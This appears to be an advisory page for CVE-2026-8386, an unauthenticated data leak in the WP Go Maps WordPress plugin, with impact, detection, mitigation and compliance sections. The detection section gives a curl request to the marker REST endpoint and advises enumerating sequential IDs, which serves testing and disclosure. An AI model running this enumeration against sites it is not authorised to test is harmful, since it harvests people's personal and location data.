Executive Summary

The vulnerability CVE-2026-8386 affects the WP Go Maps WordPress plugin versions before 10.0.10. It occurs because the plugin does not filter marker records based on their approval status on its public single-marker REST endpoint.

This flaw allows unauthenticated users to access marker records that administrators have not yet approved for public display. These records can include sensitive information such as personally identifiable information (PII) in the address and description fields, as well as the marker's geographic coordinates.

Since marker IDs are sequential integers, an attacker can easily enumerate the entire moderation queue and retrieve full marker details by sending requests to the REST endpoint or an AJAX fallback.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can lead to unauthorized disclosure of sensitive data, including personally identifiable information (PII) and geographic location data that was not intended for public access.

An attacker can exploit this flaw to gather detailed information about unapproved markers, potentially compromising user privacy and exposing confidential location data.

Such exposure can damage trust, lead to privacy violations, and may result in reputational harm or legal consequences depending on the nature of the data exposed.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by attempting to access the WP Go Maps plugin's public single-marker REST endpoint without authentication and checking if marker records, including unapproved ones, are returned.

Since marker IDs are sequential integers, you can enumerate marker records by sending HTTP requests to the REST endpoint or its AJAX fallback and observe if sensitive data such as address, description, latitude, and longitude are disclosed.

A sample command to test this could be using curl to request marker data by ID:

• curl -X GET https://your-wordpress-site.com/wp-json/wp-go-maps/v1/marker/{marker_id}

Replace {marker_id} with sequential integers to enumerate markers and check if unapproved markers are accessible.

Useful 0 Not Useful 0

Mitigation Strategies

The immediate step to mitigate this vulnerability is to update the WP Go Maps plugin to version 10.0.10 or later, where the issue has been fixed.

Until the update can be applied, consider restricting access to the REST endpoint or disabling the plugin temporarily to prevent unauthenticated access to sensitive marker data.

Useful 0 Not Useful 0

Compliance Impact

This vulnerability allows unauthenticated users to access personally identifiable information (PII) and geographic coordinates that have not been approved for public display. Such unauthorized disclosure of sensitive data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require strict controls over the exposure and handling of PII.

Because the plugin exposes unapproved marker data including PII through a public REST endpoint without filtering, it increases the risk of sensitive data exposure, which is a violation of privacy and security requirements mandated by these standards.

Useful 0 Not Useful 0